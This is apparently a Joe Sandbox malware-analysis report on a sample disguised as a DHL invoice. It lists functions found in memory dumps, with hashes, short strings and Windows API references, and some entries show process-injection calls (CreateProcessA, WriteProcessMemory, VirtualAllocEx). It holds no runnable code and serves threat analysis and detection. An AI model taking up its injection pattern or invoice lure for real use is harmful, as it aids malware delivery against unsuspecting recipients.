Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198d4d82d370c2588d86a1a16142972a076b16b47e8e017d0e8b5fa271a41840
Instruction ID: 23cb0b7b8de157a5aa8d14331ad88404845309431e8789a58c90a87b0f2dca5b
Opcode Fuzzy Hash: 198d4d82d370c2588d86a1a16142972a076b16b47e8e017d0e8b5fa271a41840
Instruction Fuzzy Hash: 63E10370E0521CCFDB14DFA5D984BADBBF6BF89304F5080AAD00AAB295CB785985CF15

Function 05F7CCBB Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d6239d1d0b197bbe90ad8cad4cc62e672a26095ef7234fc39874f4f9d3469b
Instruction ID: dac2cc261deeebbeb37545b28a5df439b144db29d06efe9611698a36b7382124
Opcode Fuzzy Hash: a5d6239d1d0b197bbe90ad8cad4cc62e672a26095ef7234fc39874f4f9d3469b
Instruction Fuzzy Hash: 0BC1E575E04218CFEB54DFA9D884BADBBF6FB89300F5080AAD409AB295CB345D85CF11

Function 0523EA60 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d149a4020a8d3fb44ef0c072e95a3fd3fef8d06e6fea2b8fe2a2b4ed63d2e819
Instruction ID: 3491e1b9749deee7fb41de2771b76fee06bdd249fc33ac67d6383d46ad247c65
Opcode Fuzzy Hash: d149a4020a8d3fb44ef0c072e95a3fd3fef8d06e6fea2b8fe2a2b4ed63d2e819
Instruction Fuzzy Hash: 7E810AB0E04209DFDB04DFA9D495AAEBBF6FF89300F158069E409AB364DB70A945CF50

Function 0523EA70 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a556b5c51ab7b761bc38c78c326be54dab3b264cfe1d6e72920f2595b7d5423b
Instruction ID: 6f5e838520fc389515c24a4fa67eca9da7450656edf4f678eb7fe1e04ee09546
Opcode Fuzzy Hash: a556b5c51ab7b761bc38c78c326be54dab3b264cfe1d6e72920f2595b7d5423b
Instruction Fuzzy Hash: 59710AB0E04209DFDB04DFA9D485AAEBBFAFF88300F158069E419AB354DB70A945CF50

Function 0624E128 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e2006c42429a7e92426b2c4ecfddbd8a94e958c4a73303cc967b739a90adfa
Instruction ID: ed0c8995b0f4c58afff9045c9b2ce074f5c69e8bae4aef8bc0cc513ec2196713
Opcode Fuzzy Hash: 05e2006c42429a7e92426b2c4ecfddbd8a94e958c4a73303cc967b739a90adfa
Instruction Fuzzy Hash: 6F612A74A14218CFEB98DF68D894BADB7F1BF49304F0580AAD859A7360DB746E85CF01

Function 05F7BF57 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30528d4d8178a4c5b2720cdd80d4aa381742d9a7bcca346c4076cd4f25b8f50b
Instruction ID: 77562d11d209df966d038d5f603af7f9d2135605784396dd0b9025ea8e480646
Opcode Fuzzy Hash: 30528d4d8178a4c5b2720cdd80d4aa381742d9a7bcca346c4076cd4f25b8f50b
Instruction Fuzzy Hash: A841E2B1D0521CCBDB04CF9AD844BEDBBF6BB8A310F14D1AAD419AB214EB785945CF50

Function 05C2A790 Relevance: 4.2, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05C2AC65
Hbq, xrefs: 05C2AC94
Hbq, xrefs: 05C2ACE4

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: cc2ce5bac123f8827582d3fc5cb85a4e46a883f1e97d0b31ccda7bd4a8842ca9
Instruction ID: ca20aa1844c04fb5e2f8d3464543dfe7162ea52cb264e018f5007795c08267ec
Opcode Fuzzy Hash: cc2ce5bac123f8827582d3fc5cb85a4e46a883f1e97d0b31ccda7bd4a8842ca9
Instruction Fuzzy Hash: B8124C35A002149FCB24DFA5C984A6EBBF6FF88300F148969E50A9B351DB75ED46CF50

Function 05C2C448 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05C2C662
4'^q, xrefs: 05C2C741
4'^q, xrefs: 05C2C7C1

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 6fe6b7d869753c86910aa9ec0d02a66a6a3da8f381d41e7d0ca0f00c757a9073
Instruction ID: 09da244e2f50299324335085a8f8729fb77131d7b164dc372ac5c575560bdde1
Opcode Fuzzy Hash: 6fe6b7d869753c86910aa9ec0d02a66a6a3da8f381d41e7d0ca0f00c757a9073
Instruction Fuzzy Hash: 7EF1C834A10218DFCB18DFA4D998AADBBB2FF88300F158559E406AB365DF71ED42CB51

Function 053C1EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'^q, xrefs: 053C2659
4'^q, xrefs: 053C2669

Memory Dump Source

Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 9bc4d385143d810c7d83e74826d3fd862a825e4dd428aa281d37d5d61f955acb
Instruction ID: 9e5a5d7995b2af3795b56b0331a73a01fc393b2c06c874fc402e2f95df6bffbb
Opcode Fuzzy Hash: 9bc4d385143d810c7d83e74826d3fd862a825e4dd428aa281d37d5d61f955acb
Instruction Fuzzy Hash: 0642C538E04209CFDB24DF98D598ABEBFB6BB49300F108099E95267354CB74AD86DF51

Function 05C26CF9 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05C27013
$^q, xrefs: 05C27023

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: d6014185cb84d0583062cbb1a1f9c3af295cdbcf520ec7943c612a1e91e6bd85
Instruction ID: f21fa1130b81b6f1b5ce07c86d6940d7d89ab35c403891521f8caee0b8737711
Opcode Fuzzy Hash: d6014185cb84d0583062cbb1a1f9c3af295cdbcf520ec7943c612a1e91e6bd85
Instruction Fuzzy Hash: A2124D34A002298FDF15DFA5D894AAEBBF6FF48700F144855E812A7395DB34AE46CF60

Function 053C29D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 053C2E66
4'^q, xrefs: 053C2E76

Memory Dump Source

Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 7b44e1e9b99b2b374eae6aaea2e9de4d5cdca3e30eb8fd60aa1bdd0fdb8d5ae4
Instruction ID: 44bb3affc58163f232ebd1263fbb80a9686c4dbf8497faa8a85610b46ddaaf42
Opcode Fuzzy Hash: 7b44e1e9b99b2b374eae6aaea2e9de4d5cdca3e30eb8fd60aa1bdd0fdb8d5ae4
Instruction Fuzzy Hash: 43F19F38E05208DFCB28DFA4E4986ADBFB6BF49315F208569E846A7354CB746D81DF40

Function 05C29E40 Relevance: 2.8, Strings: 2, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 05C2A0A1
(bq, xrefs: 05C29E54

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: becf525cbb72d8bc81d3ad775dc5b2165b2eef0876d23982ae8a2a2e59c883e5
Instruction ID: b8c87ea11acc233cadddcf53833a43079f4e7b20879ee40ab19b0499e2c97945
Opcode Fuzzy Hash: becf525cbb72d8bc81d3ad775dc5b2165b2eef0876d23982ae8a2a2e59c883e5
Instruction Fuzzy Hash: D9D16C35600616CFCB14CF29C88496AB7F2FF88310B55C969E85A9B365DB70FD41CB90

Function 053C26A8 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 053C2998
4'^q, xrefs: 053C2988

Memory Dump Source

Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 73c744c3520bb9e0683a75e3756c04dad24089412f32e10ee1c00daa46e34952
Instruction ID: acca0ec1888d054dbcdcb576245fc159b4cf5f9986b4ef810a3074322884b464
Opcode Fuzzy Hash: 73c744c3520bb9e0683a75e3756c04dad24089412f32e10ee1c00daa46e34952
Instruction Fuzzy Hash: 5BA1F638E01209CFCB18DFA5D488AAEBBB6FF88301F508069E856A7354CB756D85DF50

Function 00A53991 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Q^q, xrefs: 00A53CB8
PH^q, xrefs: 00A53D55

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: PH^q$`Q^q
API String ID: 0-3163867966
Opcode ID: bc108453fbee944e42f1f6218277c6d4ad8092f91f14ac3788c71bb9945ffc9b
Instruction ID: 4fac919b58f0cf916fee35bb3c4563babfd0e7e965443ffaffdfe2e536c4579f
Opcode Fuzzy Hash: bc108453fbee944e42f1f6218277c6d4ad8092f91f14ac3788c71bb9945ffc9b
Instruction Fuzzy Hash: 89C1C2B5A15228CFDB24CF64D8587EDBBB1BB8A341F1041D9D90EA2651DBB40EC8DF42

Function 05C28879 Relevance: 2.7, Strings: 2, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05C28994
(bq, xrefs: 05C289EB

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 6b3e2cefc9a9ccf8c97b8de2442f4f84dea4c90c6efd12aea12358174d7125b5
Instruction ID: 35ecb653f6055be525d25923f09c99a9e42f02697c906d4c4575429a111967a5
Opcode Fuzzy Hash: 6b3e2cefc9a9ccf8c97b8de2442f4f84dea4c90c6efd12aea12358174d7125b5
Instruction Fuzzy Hash: 2E51CD327002548FCB15AF29D854AAE7BA6FF84311F208569E806CF3A5CF35ED46CB91

Function 05C262C8 Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

Hbq, xrefs: 05C2645D
(bq, xrefs: 05C263CE

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 18c6d212faf81c980eae8924b8975225eafef5d5bb1558e82d5bed5cbf81ff25
Instruction ID: 68126efa53bfa137fbaa5415a043447ec0bc2cba8dfc619340e4eca0708446d1
Opcode Fuzzy Hash: 18c6d212faf81c980eae8924b8975225eafef5d5bb1558e82d5bed5cbf81ff25
Instruction Fuzzy Hash: FA517A357006108FCB29AF79C85462E7BB6FF89301B60886CE5068B3A4DE35ED46CB91

Function 00A509F2 Relevance: 2.6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00A50919
tocq, xrefs: 00A50A0A

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q$tocq
API String ID: 0-409840985
Opcode ID: c0b66997c588a3aab788f95120a48a3ee3baf16902b0197e1a56cc9af6176b7e
Instruction ID: bdd3f581e8e101440cd354a34e7ace44bc0fcd7b67fa15671e6c80dbe341655a
Opcode Fuzzy Hash: c0b66997c588a3aab788f95120a48a3ee3baf16902b0197e1a56cc9af6176b7e
Instruction Fuzzy Hash: FB313730B00214DFDB44EB68D568BADB7F2BF88701F248469E406EB3A5CB759C45DB91

Function 05C274C8 Relevance: 2.6, Strings: 2, Instructions: 53COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C2751F
$^q, xrefs: 05C2752F

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 11bd73ffd22ecda24cc03feb3667c53ca2908780b4158fa0c88f26811b473e63
Instruction ID: 3bbe024b10eabedb77e38f47e1617e07a0af5a4318aad2bfea626628bfdc617e
Opcode Fuzzy Hash: 11bd73ffd22ecda24cc03feb3667c53ca2908780b4158fa0c88f26811b473e63
Instruction Fuzzy Hash: BD118431604229DFDB24CE59D484FA9BBFAFF04364F14887AE401CB260D771DA80CB90

Function 05C2D320 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C2D69B

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: bcfd3270639a919e9789e4fa58a8970c7f742bda814e7998ffafc1c349268435
Instruction ID: 1509d9735deea73bf5696d5cbced935c07d454e1cbda06a13077e13797169537
Opcode Fuzzy Hash: bcfd3270639a919e9789e4fa58a8970c7f742bda814e7998ffafc1c349268435
Instruction Fuzzy Hash: 73521A75A002289FDB24CF69C981BEDBBF6BB88300F1585D9E509E7351DA309E81CF61

Function 05C27880 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

(_^q, xrefs: 05C27B0D

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: 12a19d008ec6f10ffbabef45fc5d3104f06a0d3a4e86ffc8dbd6727f0c03dc30
Instruction ID: 1c202575a2627ca42df055e90d522d473bf833f024b54f73bb522a6f982f11ab
Opcode Fuzzy Hash: 12a19d008ec6f10ffbabef45fc5d3104f06a0d3a4e86ffc8dbd6727f0c03dc30
Instruction Fuzzy Hash: B3224A35A002149FDB14DF69D495AADBBF2FF88310F148959E906EB3A1CB71ED81CB90

Function 0523F765 Relevance: 1.7, APIs: 1, Instructions: 204processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0523F94A

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 19ff15efe6b8f14f377060dba733d533445237f85bfd31654433a65a1e99bc6d
Instruction ID: 356fcfa3c293bc5c82d51d1eb67f86123c1767ada525293bcfce807f74b5e315
Opcode Fuzzy Hash: 19ff15efe6b8f14f377060dba733d533445237f85bfd31654433a65a1e99bc6d
Instruction Fuzzy Hash: C4816CB1D1021A9FDB14CFA9DA867EDBBF1BF48314F148129E859E7240E7789881CF81

Function 0523F770 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0523F94A

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8bef069305b2aa3407f0fa3bf105a0a3ff7bcf5f4422d5bbc3a09664d4df5781
Instruction ID: 2f3cf19e20cdbfbff14e04cf40cbb46bb2e06a08fca4970a309923aa47512304
Opcode Fuzzy Hash: 8bef069305b2aa3407f0fa3bf105a0a3ff7bcf5f4422d5bbc3a09664d4df5781
Instruction Fuzzy Hash: 668159B1D1021A9FDB14CFA9D9867EDBBF2BF48314F148129E859E7240E7789881CF81

Function 05C2E246 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C2E2EF

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 2387de1177973e2a948a201f1a5d97e983f503b736c03d9a5398df0807d71bf3
Instruction ID: ca9981537642b4a3037d5ee5cd0a5f6790dd3a20d841551827dbb7ea36593e57
Opcode Fuzzy Hash: 2387de1177973e2a948a201f1a5d97e983f503b736c03d9a5398df0807d71bf3
Instruction Fuzzy Hash: 41D10E727042268FDB24EF6AC45577EBAF6FF84300F148869E586EB391DA38D9408B51

Function 052E08F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 052E0980

Memory Dump Source

Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true

Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 959fac4208a1135156b20e8660e9850db7d72fcad2ad3e3a6b5fac4073ea4bb7
Instruction ID: ec1c83d2cc7cf1110b1029da98cdccb9c7182882c973fb768993d4591ff1a7a4
Opcode Fuzzy Hash: 959fac4208a1135156b20e8660e9850db7d72fcad2ad3e3a6b5fac4073ea4bb7
Instruction Fuzzy Hash: ED2136B19003599FDB10DFA9C885BDEBBF5FF48320F50842AE959A7250C778A944CFA4

Function 053903A0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0539041C

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a38a19d391099775bbb0232d13338e12fa5fc1063c45b731d0878d382fa3ccaf
Instruction ID: c0d5edf02c1d66eecd87a4be95291dc0c59faa4a96037c5e752542b2d070ddfb
Opcode Fuzzy Hash: a38a19d391099775bbb0232d13338e12fa5fc1063c45b731d0878d382fa3ccaf
Instruction Fuzzy Hash: 5C2127B19002499FCB14DFAAC844ADFFBF5EF48320F14842AD459A7210C778A944CFA0

Function 053903A8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0539041C

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d73437ac48daffc97651b68165f2998f22eaaf9a2950e9cefbaab32e43992281
Instruction ID: 4b7952d67402a303720b52cb53177b0e8be7b6a0e843549cd2b8dde6ad006871
Opcode Fuzzy Hash: d73437ac48daffc97651b68165f2998f22eaaf9a2950e9cefbaab32e43992281
Instruction Fuzzy Hash: 651124B19002498FCB14DFAAC844ADEFBF4EF48320F10842AD419A7210C774A944CFA0

Function 05F7C9BB Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 05F7CA2F

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 78451d7090add73b37c2c8458bf550b465145337e8f509bb77c707e9122f7156
Instruction ID: 963483a6a2f632c688b029f6915b08f1fb5817f57c4cbdc4042782702bb97e60
Opcode Fuzzy Hash: 78451d7090add73b37c2c8458bf550b465145337e8f509bb77c707e9122f7156
Instruction Fuzzy Hash: 5D113AB19002598FDB10DFAAC4457EEFFF8AB48324F14841AD455A7250CA38A944CBA4

Function 05F7C9C0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 05F7CA2F

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fe7f0a464bb1b24ab2f91e75be57373b115c7d0d8ed53db30a61fc6d92543950
Instruction ID: 3f6b23129f157e906d097d2761f8970ab4ecffada92a53605275a1807eb1e0a6
Opcode Fuzzy Hash: fe7f0a464bb1b24ab2f91e75be57373b115c7d0d8ed53db30a61fc6d92543950
Instruction Fuzzy Hash: 481149B19003598FDB10DFAAC4447EFFFF8AB88324F24842AD455A7250CB38A944CFA4

Function 052E0648 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 052E06B6

Memory Dump Source

Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true

Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fd2d5c23a6236ca14c5bdfbf8cfa3f7d8893df601465c8eb7817790ce686c08d
Instruction ID: 2d58f3f2b24f11d2befa9de12c17403b6dbe5ed616567b84c25c0b97bec19d3f
Opcode Fuzzy Hash: fd2d5c23a6236ca14c5bdfbf8cfa3f7d8893df601465c8eb7817790ce686c08d
Instruction Fuzzy Hash: A91123B29002499FCB10DFAAC844BDEBFF5EF88324F248419E559A7250C775A944CFA4

Function 05C2CD50 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C2D69B

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 22008ff14a10a5ced133415404452b6e148ac524eec87d8d71c1222c8c354a90
Instruction ID: dc4d9fa7af2994411dbb6e9a0a283f555270796c17da8b2c27eb4d220f34bc40
Opcode Fuzzy Hash: 22008ff14a10a5ced133415404452b6e148ac524eec87d8d71c1222c8c354a90
Instruction Fuzzy Hash: 6EC17275A002288FDB14DF68C945BEDBBF6BF88700F158499E509AB365CA30DD81CF60

Function 05C2D311 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C2D69B

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: f5b7cde43d0eb3ae714b4f6a7f4e5e59c9ac3e2766cddb693c4d9b5c54190450
Instruction ID: f62420cd75e6ddf2ad5c996e9e2f8c96ee752a2045b20900b46121323e306979
Opcode Fuzzy Hash: f5b7cde43d0eb3ae714b4f6a7f4e5e59c9ac3e2766cddb693c4d9b5c54190450
Instruction Fuzzy Hash: 53C16F75A002288FDB18DB68C945BEDBBF6BF88700F158499E509AB365DA30DD81CF61

Function 05C27FF0 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

Pl^q, xrefs: 05C281D8

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Pl^q
API String ID: 0-2831078282
Opcode ID: e973a0a64358c242360caabeaf3e45907f752f45ecdb378b08fcd154dc53a674
